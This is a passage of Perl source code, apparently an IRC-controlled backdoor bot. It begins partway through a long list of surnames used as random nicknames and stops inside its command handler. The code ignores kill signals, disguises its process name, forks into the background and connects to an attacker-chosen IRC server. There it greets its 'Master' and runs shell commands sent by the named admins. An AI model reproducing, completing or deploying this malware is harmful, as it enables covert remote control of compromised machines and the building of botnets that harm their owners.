 184 | "Brewer",
 185 | "Bridgeman",
 186 | "Bridges",
 187 | "Brinton",
 188 | "Britz",
 189 | "Broca",
 190 | "Brook",
 191 | "Brzycki",
 192 | "Buchan",
 193 | "Budding",
 194 | "Bullard",
 195 | "Bunton",
 196 | "Burden",
 197 | "Burdzy",
 198 | "Burke",
 199 | "Burridge",
 200 | "Busetta",
 201 | "Byatt",
 202 | "Byerly",
 203 | "Byrd",
 204 | "Cage",
 205 | "Calnan",
 206 | "Cammelli",
 207 | "Cammilleri",
 208 | "Canley",
 209 | "Capanni",
 210 | "Caperton",
 211 | "Capocaccia",
 212 | "Capodilupo",
 213 | "Cappuccio",
 214 | "Capursi",
 215 | "Caratozzolo",
 216 | "Carayannopoulos",
 217 | "Carlin",
 218 | "Carlos",
 219 | "Carlyle",
 220 | "Carmichael",
 221 | "Caroti",
 222 | "Carper",
 223 | "Cartmill",
 224 | "Cascio",
 225 | "Case",
 226 | "Caspar",
 227 | "Castelda",
 228 | "Cavanagh",
 229 | "Cavell",
 230 | "Ceniceros",
 231 | "Cerioli",
 232 | "Chapman",
 233 | "Charles",
 234 | "Cheang",
 235 | "Cherry",
 236 | "Chervinsky",
 237 | "Chiassino",
 238 | "Chien",
 239 | "Childress",
 240 | "Childs",
 241 | "Chinipardaz",
 242 | "Chinman",
 243 | "Christenson",
 244 | "Christian",
 245 | "Christiano",
 246 | "Christie",
 247 | "Christopher",
 248 | "Chu",
 249 | "Chupasko",
 250 | "Church",
 251 | "Ciampaglia",
 252 | "Cicero",
 253 | "Cifarelli",
 254 | "Claffey",
 255 | "Clancy",
 256 | "Clark",
 257 | "Clement",
 258 | "Clifton",
 259 | "Clow",
 260 | "Coblenz",
 261 | "Coito",
 262 | "Coldren",
 263 | "Colella",
 264 | "Collard",
 265 | "Collis",
 266 | "Compton",
 267 | "Compton",
 268 | "Comstock",
 269 | "Concino",
 270 | "Condodina",
 271 | "Connors",
 272 | "Corey",
 273 | "Cornish",
 274 | "Cosmides",
 275 | "Counter",
 276 | "Coutaux",
 277 | "Crawford",
 278 | "Crocker",
 279 | "Croshaw",
 280 | "Croxen",
 281 | "Croxton",
 282 | "Cui",
 283 | "Currier",
 284 | "Cutler",
 285 | "Cvek",
 286 | "Cyders",
 287 | "daSilva",
 288 | "Daldalian",
 289 | "Daly",
 290 | "D'Ambra",
 291 | "Danieli",
 292 | "Dante",
 293 | "Dapice",
 294 | "D'arcangelo",
 295 | "Das",
 296 | "Dasgupta",
 297 | "Daskalu",
 298 | "David",
 299 | "Dawkins",
 300 | "DeGennaro",
 301 | "DeLaPena",
 302 | "del'Enclos",
 303 | "deRousse",
 304 | "Debroff",
 305 | "Dees",
 306 | "Defeciani",
 307 | "Delattre",
 308 | "Deleon-Rendon",
 309 | "Delger",
 310 | "Dell'acqua",
 311 | "Deming",
 312 | "Dempster",
 313 | "Demusz",
 314 | "Denault",
 315 | "Denham",
 316 | "Denison",
 317 | "Desombre",
 318 | "Deutsch",
 319 | "D'fini",
 320 | "Dicks",
 321 | "Diefenbach",
 322 | "Difabio",
 323 | "Difronzo",
 324 | "Dilworth",
 325 | "Dionysius",
 326 | "Dirksen",
 327 | "Dockery",
 328 | "Doherty",
 329 | "Donahue",
 330 | "Donner",
 331 | "Doonan",
 332 | "Dore",
 333 | "Dorf",
 334 | "Dosi",
 335 | "Doty",
 336 | "Doug",
 337 | "Dowsland",
 338 | "Drinker",
 339 | "D'souza",
 340 | "Duffin",
 341 | "Durrett",
 342 | "Dussault",
 343 | "Dwyer",
 344 | "Eardley",
 345 | "Ebeling",
 346 | "Eckel",
 347 | "Edley",
 348 | "Edner",
 349 | "Edward",
 350 | "Eickenhorst",
 351 | "Eliasson",
 352 | "Elmendorf",
 353 | "Elmerick",
 354 | "Elvis",
 355 | "Encinas",
 356 | "Enyeart",
 357 | "Eppling",
 358 | "Erbach",
 359 | "Erdman",
 360 | "Erdos",
 361 | "Erez",
 362 | "Espinoza",
 363 | "Estes",
 364 | "Etter",
 365 | "Euripides",
 366 | "Everett",
 367 | "Fabbris",
 368 | "Fagan",
 369 | "Faioes",
 370 | "Falco-Acosta",
 371 | "Falorsi",
 372 | "Faris",
 373 | "Farone",
 374 | "Farren",
 375 | "Fasso'",
 376 | "Fates",
 377 | "Feigenbaum",
 378 | "Fejzo",
 379 | "Feldman",
 380 | "Fernald",
 381 | "Fernandes",
 382 | "Ferrante",
 383 | "Ferriell",
 384 | "Feuer",
 385 | "Fido",
 386 | "Field",
 387 | "Fink",
 388 | "Finkelstein",
 389 | "Finnegan",
 390 | "Fiorina",
 391 | "Fisk",
 392 | "Fitzmaurice",
 393 | "Flier",
 394 | "Flores",
 395 | "Folks",
 396 | "Forester",
 397 | "Fortes",
 398 | "Fortier",
 399 | "Fossey",
 400 | "Fossi",
 401 | "Francisco",
 402 | "Franklin-Kenea",
 403 | "Franz",
 404 | "Frazier-Davis",
 405 | "Freid",
 406 | "Freundlich",
 407 | "Fried",
 408 | "Friedland",
 409 | "Frisken",
 410 | "Frowiss",
 411 | "Fryberger",
 412 | "Frye",
 413 | "Fujii-Abe",
 414 | "Fuller",
 415 | "Furth",
 416 | "Fusaro",
 417 | "Gabrielli",
 418 | "Gaggiotti",
 419 | "Galeotti",
 420 | "Galwey",
 421 | "Gambini",
 422 | "Garfield",
 423 | "Garman",
 424 | "Garonna",
 425 | "Geller",
 426 | "Gemberling",
 427 | "Georgi",
 428 | "Gerrett",
 429 | "Ghorai",
 430 | "Gibbens",
 431 | "Gibson",
 432 | "Gilbert",
 433 | "Gili",
 434 | "Gill",
 435 | "Gillispie",
 436 | "Gist",
 437 | "Gleason",
 438 | "Glegg",
 439 | "Glendon",
 440 | "Goldfarb",
 441 | "Goncalves",
 442 | "Good",
 443 | "Goodearl",
 444 | "Goody",
 445 | "Gozzi",
 446 | "Gravell",
 447 | "Greenberg",
 448 | "Greenfeld",
 449 | "Griffiths",
 450 | "Grigoletto",
 451 | "Grummell",
 452 | "Gruner",
 453 | "Gruppe",
 454 | "Guenthart",
 455 | "Gunn",
 456 | "Guo",
 457 | "Ha",
 458 | "Haar",
 459 | "Hackman",
 460 | "Hackshaw",
 461 | "Haley",
 462 | "Halkias",
 463 | "Hallowell",
 464 | "Halpert",
 465 | "Hambarzumjan",
 466 | "Hamer",
 467 | "Hammerness",
 468 | "Hand",
 469 | "Hanssen",
 470 | "Harding",
 471 | "Hargraves",
 472 | "Harlow",
 473 | "Harrigan",
 474 | "Hartman",
 475 | "Hartmann",
 476 | "Hartnett",
 477 | "Harwell",
 478 | "Haviaras",
 479 | "Hawkes",
 480 | "Hayes",
 481 | "Haynes",
 482 | "Hazlewood",
 483 | "Heermans",
 484 | "Heft",
 485 | "Heiland",
 486 | "Hellman",
 487 | "Hellmiss",
 488 | "Helprin",
 489 | "Hemphill",
 490 | "Henery",
 491 | "Henrichs",
 492 | "Hernandez",
 493 | "Herrera",
 494 | "Hester",
 495 | "Heubert",
 496 | "Heyeck",
 497 | "Himmelfarb",
 498 | "Hind",
 499 | "Hirst",
 500 | "Hitchcock",
 501 | "Hoang",
 502 | "Hock",
 503 | "Hoffer",
 504 | "Hoffman",
 505 | "Hokanson",
 506 | "Hokoda",
 507 | "Holmes",
 508 | "Holoien",
 509 | "Holter",
 510 | "Holway",
 511 | "Holzman",
 512 | "Hooker",
 513 | "Hopkins",
 514 | "Horsley",
 515 | "Hoshida",
 516 | "Hostage",
 517 | "Hottle",
 518 | "Howard",
 519 | "Hoy",
 520 | "Huey",
 521 | "Huidekoper",
 522 | "Hungerford",
 523 | "Huntington",
 524 | "Hupp",
 525 | "Hurtubise",
 526 | "Hutchings",
 527 | "Hyde",
 528 | "Iaquinta",
 529 | "Ichikawa",
 530 | "Igarashi",
 531 | "Inamura",
 532 | "Inniss",
 533 | "Isaac",
 534 | "Isaievych",
 535 | "Isbill",
 536 | "Isserman",
 537 | "Iyer",
 538 | "Jacenko",
 539 | "Jackson",
 540 | "Jagers",
 541 | "Jagger",
 542 | "Jagoe",
 543 | "Jain",
 544 | "Jamil",
 545 | "Janjigian",
 546 | "Jarnagin",
 547 | "Jarrell",
 548 | "Jay",
 549 | "Jeffers",
 550 | "Jellis",
 551 | "Jenkins",
 552 | "Jespersen",
 553 | "Jewett",
 554 | "Johannesson",
 555 | "Johannsen",
 556 | "Johns",
 557 | "Jolly",
 558 | "Jorgensen",
 559 | "Jucks",
 560 | "Juliano",
 561 | "Julious",
 562 | "Kabbash",
 563 | "Kaboolian",
 564 | "Kafadar",
 565 | "Kalbfleisch",
 566 | "Kaligian",
 567 | "Kalil",
 568 | "Kalinowski",
 569 | "Kalman",
 570 | "Kamel",
 571 | "Kangis",
 572 | "Karpouzes",
 573 | "Kassower",
 574 | "Kasten",
 575 | "Kawachi",
 576 | "Kee",
 577 | "Keenan",
 578 | "Keepper",
 579 | "Keith",
 580 | "Kelker",
 581 | "Kelsey",
 582 | "Kempton",
 583 | "Kemsley",
 584 | "Kendall",
 585 | "Kerry",
 586 | "Keul",
 587 | "Khong",
 588 | "Kimmel",
 589 | "Kimmett",
 590 | "Kimura",
 591 | "Kindall",
 592 | "Kinsley",
 593 | "Kippenberger",
 594 | "Kirscht",
 595 | "Kittridge",
 596 | "Kleckner",
 597 | "Kleiman",
 598 | "Kleinfelder",
 599 | "Klemperer",
 600 | "Kling",
 601 | "Klinkenborg",
 602 | "Klint",
 603 | "Knuff",
 604 | "Kobrick",
 605 | "Koch",
 606 | "Kohn",
 607 | "Koivumaki",
 608 | "Kommer",
 609 | "Koniaris",
 610 | "Konrad",
 611 | "Kool",
 612 | "Korzybski",
 613 | "Kotter",
 614 | "Kovaks",
 615 | "Kraemer",
 616 | "Krailo",
 617 | "Krasney",
 618 | "Kraus",
 619 | "Kroemer",
 620 | "Krysiak",
 621 | "Kuenzli",
 622 | "Kumar",
 623 | "Kusman",
 624 | "Kuwabara",
 625 | "La",
 626 | "Labunka",
 627 | "Lafler",
 628 | "Laing",
 629 | "Lallemant",
 630 | "Landes",
 631 | "Lankes",
 632 | "Lantieri",
 633 | "Lanzit",
 634 | "Laserna",
 635 | "Lashley",
 636 | "Lawless",
 637 | "Lecar",
 638 | "Lecce",
 639 | "Leclercq",
 640 | "Leite",
 641 | "Lenard",
 642 | "l'Enclos",
 643 | "Lesser",
 644 | "Lessi",
 645 | "Liakos",
 646 | "Lidano",
 647 | "Liem",
 648 | "Light",
 649 | "Lightfoot",
 650 | "Lim",
 651 | "Linares",
 652 | "Linda",
 653 | "Linder",
 654 | "Line",
 655 | "Linehan",
 656 | "Linzee",
 657 | "Lippmann",
 658 | "Lipponen",
 659 | "Little",
 660 | "Litvak",
 661 | "Livernash",
 662 | "Livi",
 663 | "Livolsi",
 664 | "Lizardo",
 665 | "Locatelli",
 666 | "Longworth",
 667 | "Loss",
 668 | "Loveman",
 669 | "Lowenstein",
 670 | "Loza",
 671 | "Lubin",
 672 | "Lucas",
 673 | "Luciano",
 674 | "Luczkow",
 675 | "Luecke",
 676 | "Lunetta",
 677 | "Luoma",
 678 | "Lussier",
 679 | "Lutcavage",
 680 | "Luzader",
 681 | "Ma",
 682 | "Maccormac",
 683 | "Macdonald",
 684 | "Maceachern",
 685 | "Macintyre",
 686 | "Mackenney",
 687 | "MacMillan",
 688 | "Macy",
 689 | "Madigan",
 690 | "Maggio",
 691 | "Mahony",
 692 | "Maier",
 693 | "Maine-Hershey",
 694 | "Maisano",
 695 | "Malatesta",
 696 | "Maller",
 697 | "Malova",
 698 | "Manalis",
 699 | "Mandel",
 700 | "Manganiello",
 701 | "Mantovan",
 702 | "March",
 703 | "Marchbanks",
 704 | "Marcus",
 705 | "Margalit",
 706 | "Margetts",
 707 | "Marques",
 708 | "Martinez",
 709 | "Martochio",
 710 | "Marton",
 711 | "Marubini",
 712 | "Mass",
 713 | "Matalka",
 714 | "Matarazzo",
 715 | "Matsukata",
 716 | "Mattson",
 717 | "Mauzy",
 718 | "May",
 719 | "Mazzali",
 720 | "Mazziotta",
 721 | "Mcbride",
 722 | "Mccaffery",
 723 | "Mccall",
 724 | "Mcclearn",
 725 | "Mcdowell",
 726 | "Mcelroy",
 727 | "McFadden",
 728 | "Mcghee",
 729 | "Mcgoldrick",
 730 | "McIlroy",
 731 | "Mcintosh",
 732 | "Mckenna",
 733 | "Mclane",
 734 | "Mclaren",
 735 | "Mcnealy",
 736 | "Mcnulty",
 737 | "Meccariello",
 738 | "Memisoglu",
 739 | "Menzies",
 740 | "Merikoski",
 741 | "Merlani",
 742 | "Merminod",
 743 | "Merseth",
 744 | "Merz",
 745 | "Metelka",
 746 | "Metropolis",
 747 | "Meurer",
 748 | "Michelman",
 749 | "Middle",
 750 | "Mieher",
 751 | "Mills",
 752 | "Minh",
 753 | "Mini",
 754 | "Minichiello",
 755 | "Gonzalez",
 756 | "Mitropoulos",
 757 | "Mittal",
 758 | "Mocroft",
 759 | "Modestino",
 760 | "Moeller",
 761 | "Mohr",
 762 | "Moiamedi",
 763 | "Monque",
 764 | "Montilio",
 765 | "MooreDeCh.",
 766 | "Morani",
 767 | "Moreton",
 768 | "Morrison",
 769 | "Morrow",
 770 | "Mortimer",
 771 | "Mosher",
 772 | "Mosler",
 773 | "Mostafavi",
 774 | "Motooka",
 775 | "Mudarri",
 776 | "Muello",
 777 | "Mugnai",
 778 | "Mulkern",
 779 | "Mulroy",
 780 | "Mumford",
 781 | "Mussachio",
 782 | "Naddeo",
 783 | "Napolitano",
 784 | "Nardi",
 785 | "Nardone",
 786 | "Naviaux",
 787 | "Nayduch",
 788 | "Nelson",
 789 | "Nenna",
 790 | "Nesci",
 791 | "Neuman",
 792 | "Newfeld",
 793 | "Newlin",
 794 | "Ng",
 795 | "Ni",
 796 | "Nickerson",
 797 | "Nickoloff",
 798 | "Nisenson",
 799 | "Nitabach",
 800 | "Notman",
 801 | "Nuzum",
 802 | "Ocougne",
 803 | "Ogata",
 804 | "Oh",
 805 | "O'hagan",
 806 | "Oldford",
 807 | "Olsen",
 808 | "Olson",
 809 | "Olszewski",
 810 | "O'malley",
 811 | "Oman",
 812 | "O'meara",
 813 | "Opel",
 814 | "Oray",
 815 | "Orfield",
 816 | "Orsi",
 817 | "Ospina",
 818 | "Ostrowski",
 819 | "Ottaviani",
 820 | "Otten",
 821 | "Ouchida",
 822 | "Ovid",
 823 | "PaesDealmeida",
 824 | "Paine",
 825 | "Palayoor",
 826 | "Palepu",
 827 | "Pallara",
 828 | "Palmitesta",
 829 | "Panadero",
 830 | "Panizzon",
 831 | "Pantilla",
 832 | "Paoletti",
 833 | "Parmeggiani",
 834 | "Parris",
 835 | "Partridge",
 836 | "Pascucci",
 837 | "Patefield",
 838 | "Patrick",
 839 | "Pattullo",
 840 | "Pavetti",
 841 | "Pavlon",
 842 | "Pawloski",
 843 | "Paynter",
 844 | "Peabody",
 845 | "Pearlberg",
 846 | "Pederson",
 847 | "Peishel",
 848 | "Penny",
 849 | "Pereira",
 850 | "Perko",
 851 | "Perlak",
 852 | "Perlman",
 853 | "Perna",
 854 | "Perone",
 855 | "Perrimon",
 856 | "Peters",
 857 | "Petruzello",
 858 | "Pettibone",
 859 | "Pettit",
 860 | "Pfister",
 861 | "Pilbeam",
 862 | "Pinot",
 863 | "Plancon",
 864 | "Plant",
 865 | "Plasket",
 866 | "Plous",
 867 | "Po",
 868 | "Pocobene",
 869 | "Poincaire",
 870 | "Pointer",
 871 | "Poirier",
 872 | "Polak",
 873 | "Polanyi",
 874 | "Politis",
 875 | "Poma",
 876 | "Poolman",
 877 | "Powers",
 878 | "Presper",
 879 | "Preucel",
 880 | "Prevost",
 881 | "Pritchard",
 882 | "Pritz",
 883 | "Proietti",
 884 | "Prothrow-Stith",
 885 | "Puccia",
 886 | "Pugh",
 887 | "Pynchon",
 888 | "Quaday",
 889 | "Quetin",
 890 | "Rabe",
 891 | "Rabkin",
 892 | "Radeke",
 893 | "Rajagopalan",
 894 | "Raney",
 895 | "Rangan",
 896 | "Rankin",
 897 | "Rapple",
 898 | "Rayport",
 899 | "Redden-Tyler",
 900 | "Reedquist",
 901 | "Cunningham",
 902 | "Reinold",
 903 | "Remak",
 904 | "Renick",
 905 | "Repetto",
 906 | "Resnik",
 907 | "Rhea",
 908 | "Richmond",
 909 | "Rielly",
 910 | "Rindos",
 911 | "Rineer",
 912 | "Rish",
 913 | "Rivera",
 914 | "Robinson",
 915 | "Rocha",
 916 | "Roesler",
 917 | "Rogers",
 918 | "Ronen",
 919 | "Row",
 920 | "Royal",
 921 | "Ru",
 922 | "Ruan",
 923 | "Ruderman",
 924 | "Ruescher",
 925 | "Rush",
 926 | "Ryu",
 927 | "Sabatello",
 928 | "Sadler",
 929 | "Safire",
 930 | "Sahu",
 931 | "Sali",
 932 | "Samson",
 933 | "Sanchez-Ramirez",
 934 | "Sanna",
 935 | "Sapers",
 936 | "Sarin",
 937 | "Sartore",
 938 | "Sase",
 939 | "Satin",
 940 | "Satta",
 941 | "Satterthwaite",
 942 | "Sawtell",
 943 | "Sayied",
 944 | "Scarponi",
 945 | "Scepan",
 946 | "Scharf",
 947 | "Scharlemann",
 948 | "Scheiner",
 949 | "Schiano",
 950 | "Schifini",
 951 | "Schilling",
 952 | "Schmitt",
 953 | "Schossberger",
 954 | "Schuman",
 955 | "Schutte",
 956 | "Schuyler",
 957 | "Schwan",
 958 | "Schwickrath",
 959 | "Scovel",
 960 | "Scudder",
 961 | "Seaton",
 962 | "Seeber",
 963 | "Segal",
 964 | "Sekler",
 965 | "Selvage",
 966 | "Sen",
 967 | "Sennett",
 968 | "Seterdahl",
 969 | "Sexton",
 970 | "Seyfert",
 971 | "Shaikh",
 972 | "Shakis",
 973 | "Shankland",
 974 | "Shanley",
 975 | "Shar",
 976 | "Shatrov",
 977 | "Shavelson",
 978 | "Shea",
 979 | "Sheats",
 980 | "Shepherd",
 981 | "Sheppard",
 982 | "Shepstone",
 983 | "Shesko",
 984 | "Shia",
 985 | "Shibata",
 986 | "Shimon",
 987 | "Siesto",
 988 | "Sigalot",
 989 | "Sigini",
 990 | "Signa",
 991 | "Silverman",
 992 | "Silvetti",
 993 | "Sinsabaugh",
 994 | "Sirilli",
 995 | "Sites",
 996 | "Skane",
 997 | "Skerry",
 998 | "Skoda",
 999 | "Sloan",
1000 | "Slowe",
1001 | "Smilow",
1002 | "Sniffen",
1003 | "Snodgrass",
1004 | "Socolow",
1005 | "Solon",
1006 | "Somers",
1007 | "Sommariva",
1008 | "Sorabella",
1009 | "Sorg",
1010 | "Sottak",
1011 | "Soukup",
1012 | "Soule",
1013 | "Soultanian",
1014 | "Spanier",
1015 | "Sparrow",
1016 | "Spaulding",
1017 | "Speizer",
1018 | "Spence",
1019 | "Sperber",
1020 | "Spicer",
1021 | "Spiegelhalter",
1022 | "Spiliotis",
1023 | "Spinrad",
1024 | "StMartin",
1025 | "Stalvey",
1026 | "Stam",
1027 | "Stang",
1028 | "Stassinopolus",
1029 | "States",
1030 | "Statlender",
1031 | "Stefani",
1032 | "Steiner",
1033 | "Stephanian",
1034 | "Stepniewska",
1035 | "Stewart-Oaten",
1036 | "Stiepock",
1037 | "Stillwell",
1038 | "Stock",
1039 | "Stockton",
1040 | "Stockwell",
1041 | "Stolzenberg",
1042 | "Stonich",
1043 | "Storer",
1044 | "Stott",
1045 | "Strange",
1046 | "Strauch",
1047 | "Streiff",
1048 | "Stringer",
1049 | "Sullivan",
1050 | "Sumner",
1051 | "Suo",
1052 | "Surdam",
1053 | "Sweeting",
1054 | "Sweetser",
1055 | "Swindle",
1056 | "Tagiuri",
1057 | "Tai",
1058 | "Talaugon",
1059 | "Tambiah",
1060 | "Tandler",
1061 | "Tanowitz",
1062 | "Tatar",
1063 | "Taveras",
1064 | "Tawn",
1065 | "Tcherepnin",
1066 | "Teague",
1067 | "Temes",
1068 | "Temmer",
1069 | "Tenney",
1070 | "Terracini",
1071 | "Than",
1072 | "Thavaneswaran",
1073 | "Theodos",
1074 | "Thibault",
1075 | "Thisted",
1076 | "Thomsen",
1077 | "Throop",
1078 | "Tierney",
1079 | "Till",
1080 | "Timmons",
1081 | "Tofallis",
1082 | "Tollestrup",
1083 | "Tolls",
1084 | "Tolman",
1085 | "Tomford",
1086 | "Toomer",
1087 | "Topulos",
1088 | "Torresi",
1089 | "Torske",
1090 | "Towler",
1091 | "Toye",
1092 | "Traebert",
1093 | "Trenga",
1094 | "Trewin",
1095 | "Tringali",
1096 | "Troiani",
1097 | "Troy",
1098 | "Truss",
1099 | "Tsiatis",
1100 | "Tsomides",
1101 | "Tsukurov",
1102 | "Tuck",
1103 | "Tudge",
1104 | "Tukan",
1105 | "Turano",
1106 | "Turek",
1107 | "Tuttle",
1108 | "Twells",
1109 | "Tzamarias",
1110 | "Ullman",
1111 | "Untermeyer",
1112 | "Upsdell",
1113 | "Urban",
1114 | "Urdang-Brown",
1115 | "Usdan",
1116 | "Uzuner",
1117 | "Vacca",
1118 | "Waite",
1119 | "Valberg",
1120 | "Valencia",
1121 | "Wales",
1122 | "Wallenberg",
1123 | "Walter",
1124 | "vanAllen",
1125 | "VanZwet",
1126 | "Vandenberg",
1127 | "Vanheeckeren",
1128 | "Warshafsky",
1129 | "Wasowska",
1130 | "Vasquez",
1131 | "Waugh",
1132 | "Weighart",
1133 | "Weingarten",
1134 | "Weinhaus",
1135 | "Weissbourd",
1136 | "Weissman",
1137 | "Velasquez",
1138 | "Welles",
1139 | "Welsh",
1140 | "Wengret",
1141 | "Venne",
1142 | "Verghese",
1143 | "Wescott",
1144 | "Wetzel",
1145 | "Whately",
1146 | "Whilton",
1147 | "White",
1148 | "Whitla",
1149 | "Whittaker",
1150 | "Viana",
1151 | "Viano",
1152 | "Wiedersheim",
1153 | "Wiener",
1154 | "Viens",
1155 | "Vignola",
1156 | "Wilder",
1157 | "Wilhelm",
1158 | "Wilk",
1159 | "Wilkin",
1160 | "Wilkinson",
1161 | "Villarreal",
1162 | "Willstatter",
1163 | "Wilson",
1164 | "Vitali",
1165 | "Viviani",
1166 | "Voigt",
1167 | "Wolk",
1168 | "VonHoffman",
1169 | "Woo",
1170 | "Wooden",
1171 | "Woods",
1172 | "Woods-Powell",
1173 | "Vorhaus",
1174 | "Votey",
1175 | "Yacono",
1176 | "Yamane",
1177 | "Yankee",
1178 | "Yarchuk",
1179 | "Yates",
1180 | "Ybarra",
1181 | "Yedidia",
1182 | "Yesson",
1183 | "Yetiv",
1184 | "Yoffe",
1185 | "Yoo",
1186 | "Youk-See",
1187 | "Yu",
1188 | "Zachary",
1189 | "Zahedi",
1190 | "Zangwill",
1191 | "Zegans",
1192 | "Zerbini",
1193 | "Zoldak",
1194 | "Zucconi",
1195 | "Zurn",
1196 | "Zytowski");
1197 | my $nick = $nickname[rand scalar @nickname];
1198 | #Nickname of insect
1199 | my $ircname =$nickname[rand scalar @nickname];
1200 | $servidor = $ARGV[0] unless $servidor;
1201 | my $porta = $ARGV[1];
1202 | my @canais = ('#'.$ARGV[2]);
1203 | my @adms = ("$ARGV[3]");
1204 | my $processo = $ARGV[4];
1205 | chop (my $realname = `hostname`);
1206 | 
1207 | my $success   = "\n [+] Bot Shell\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n\n";
1208 | my $failed    = "\n [?] perl $0 <irchost> <port> <chan> <admin> <fakeproc>\n\n";
1209 | 
1210 | if (@ARGV != 5) { print $failed; exit(); } else { print $success; }
1211 | 
1212 | $SIG{'INT'} = 'IGNORE';
1213 | $SIG{'HUP'} = 'IGNORE';
1214 | $SIG{'TERM'} = 'IGNORE';
1215 | $SIG{'CHLD'} = 'IGNORE';
1216 | $SIG{'PS'} = 'IGNORE';
1217 | 
1218 | use IO::Socket;
1219 | use Socket;
1220 | use IO::Select;
1221 | chdir("/");
1222 | $servidor="$ARGV[0]" if $ARGV[0];
1223 | $0="$processo"."\0"x16;;
1224 | my $pid=fork;
1225 | exit if $pid;
1226 | die "Problema com o fork: $!" unless defined($pid);
1227 | our %irc_servers;
1228 | our %DCC;
1229 | my $dcc_sel = new IO::Select->new();
1230 | $sel_cliente = IO::Select->new();
1231 | sub sendraw {
1232 |   if ($#_ == '1') {
1233 |     my $socket = $_[0];
1234 |     print $socket "$_[1]\n";
1235 |   } else {
1236 |       print $IRC_cur_socket "$_[0]\n";
1237 |   }
1238 | }
1239 | 
1240 | sub conectar {
1241 |    my $meunick = $_[0];
1242 |    my $servidor_con = $_[1];
1243 |    my $porta_con = $_[2];
1244 | 
1245 |    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
1246 |    if (defined($IRC_socket)) {
1247 |      $IRC_cur_socket = $IRC_socket;
1248 | 
1249 |      $IRC_socket->autoflush(1);
1250 |      $sel_cliente->add($IRC_socket);
1251 | 
1252 |      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
1253 |      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
1254 |      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
1255 |      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
1256 |      nick("$meunick");
1257 |      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
1258 |      sleep 1;
1259 |    }
1260 | }
1261 | 
1262 | my $line_temp;
1263 | while( 1 ) {
1264 |    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
1265 |    delete($irc_servers{''}) if (defined($irc_servers{''}));
1266 |    my @ready = $sel_cliente->can_read(0);
1267 |    next unless(@ready);
1268 |    foreach $fh (@ready) {
1269 |      $IRC_cur_socket = $fh;
1270 |      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
1271 |      $nread = sysread($fh, $msg, 4096);
1272 |      if ($nread == 0) {
1273 |         $sel_cliente->remove($fh);
1274 |         $fh->close;
1275 |         delete($irc_servers{$fh});
1276 |      }
1277 |      @lines = split (/\n/, $msg);
1278 | 
1279 |      for(my $c=0; $c<= $#lines; $c++) {
1280 |        $line = $lines[$c];
1281 |        $line=$line_temp.$line if ($line_temp);
1282 |        $line_temp='';
1283 |        $line =~ s/\r$//;
1284 |        unless ($c == $#lines) {
1285 |          parse("$line");
1286 |        } else {
1287 |            if ($#lines == 0) {
1288 |              parse("$line");
1289 |            } elsif ($lines[$c] =~ /\r$/) {
1290 |                parse("$line");
1291 |            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
1292 |                parse("$line");
1293 |            } else {
1294 |                $line_temp = $line;
1295 |            }
1296 |        }
1297 |       }
1298 |    }
1299 | }
1300 | 
1301 | sub parse {
1302 |    my $servarg = shift;
1303 |    if ($servarg =~ /^PING \:(.*)/) {
1304 |      sendraw("PONG :$1");
1305 |    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
1306 |        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
1307 |        if ($args =~ /^\001VERSION\001$/) {
1308 |          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
1309 |        }
1310 |        if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
1311 |          if ($onde eq "$meunick"){
1312 |            shell("$pn", "$args");
1313 |          }
1314 |          if ($args =~ /^(\Q$meunick\E|\!bht)\s+(.*)/ ) {
1315 |             my $natrix = $1;
1316 |             my $arg = $2;
1317 |             if ($arg =~ /^\!(.*)/) {
1318 |               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
1319 |             } elsif ($arg =~ /^\@(.*)/) {
1320 |                 $ondep = $onde;
1321 |                 $ondep = $pn if $onde eq $meunick;
1322 |                 bfunc("$ondep","$1", "$pn");
1323 |             } else {
1324 |                 shell("$onde", "$arg");
1325 |             }
1326 |          }
1327 |        }
1328 | }
1329 |     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
1330 |        if (lc($1) eq lc($meunick)) {
1331 |          $meunick=$4;
1332 |          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
1333 |        }
1334 |    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
1335 |        nick("$meunick-".int rand(999999));
1336 |    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
1337 |        $meunick = $2;
1338 |        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
1339 |        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
1340 |        foreach my $canal (@canais) {
1341 |          sendraw("JOIN $canal s6x");
1342 |          sendraw("PRIVMSG @adms :You Are My Master");
1343 |        }
1344 |    }
1345 | }
1346 | 
1347 | sub bfunc {
1348 |   my $msgpriv = "$_[2]";
1349 |   my $printl = $_[0];
1350 |   my $funcarg = $_[1];
1351 |   if (my $pid = fork) {
1352 |      waitpid($pid, 0);
1353 |   } else {
1354 |       if (fork) {
1355 |          exit;
1356 |        } else {
1357 |            if ($funcarg =~ /^nick (.*)/) {
1358 |               sendraw($IRC_cur_socket, "NICK ".$1);
1359 |               $nick=$1;
1360 |            }
1361 |            if ($funcarg =~ /^join (.*)/) {
1362 |               sendraw($IRC_cur_socket, "JOIN ".$1);
1363 |            }
1364 |            if ($funcarg =~ /^part (.*)/) {
1365 |               sendraw($IRC_cur_socket, "PART ".$1);
1366 |            }
1367 |            if ($funcarg =~ /^msg\s+(\S+) (.*)/) {
1368 |               sendraw($IRC_cur_socket, "PRIVMSG ".$1." :".$2);
1369 |            }
1370 |            if ($funcarg =~ /^op (.*)/) {
1371 |               sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
1372 |            }
